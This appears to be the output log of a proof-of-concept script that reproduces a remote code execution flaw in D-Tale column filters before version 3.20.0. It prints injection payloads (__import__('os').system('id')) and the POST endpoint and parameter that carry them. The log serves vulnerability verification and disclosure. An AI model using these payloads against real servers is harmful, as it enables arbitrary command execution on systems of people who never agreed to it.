[*] D-Tale RCE Vulnerability Reproduction
[*] Testing if malicious column filters can execute arbitrary code

[+] Test DataFrame:
      name  age  salary     city
0    Alice   25   50000      NYC
1      Bob   30   60000       LA
2  Charlie   35   70000  Chicago
3     Dave   40   80000  Houston

[1] Demonstrating pandas DataFrame.query() with python engine...
The python engine evaluates expressions as Python code
[OK] Safe query '`age` > 30' returned 2 rows

[2] Testing StringFilter with code injection payload...
[WARNING] Filter accepted malicious value!
[WARNING] Generated query: `name` == "__import__('os').system('echo RCE')"
[CRITICAL] Malicious code appears in query string!
[CRITICAL] Query: `name` == "__import__('os').system('echo RCE')"

[3] Testing OutlierFilter with direct query injection...
[WARNING] OutlierFilter accepted raw query!
[CRITICAL] Query content: __import__('os').system('id')
[CRITICAL] Raw malicious code in query - RCE possible!

[4] Checking for security validation in column_filters.py...
[VULNERABLE] ColumnFilterSecurity class NOT found
[VULNERABLE] _DANGEROUS_PATTERNS regex NOT found
[VULNERABLE] validate_query_safety() NOT found in query.py
[VULNERABLE] _DANGEROUS_QUERY_PATTERNS NOT found in query.py

============================================================
FINAL ASSESSMENT:
============================================================
[RESULT] VULNERABILITY CONFIRMED
[RESULT] Version < 3.20.0 without input validation detected
[RESULT] Malicious column filters can inject code into pandas.query()

Attack Vector:
1. Attacker sends POST to /dtale/save-column-filter/
2. Malicious code embedded in 'cfg' parameter's value/raw fields
3. Query is built and passed to pandas.DataFrame.query(engine='python')
4. Python evaluates the malicious expression, executing arbitrary code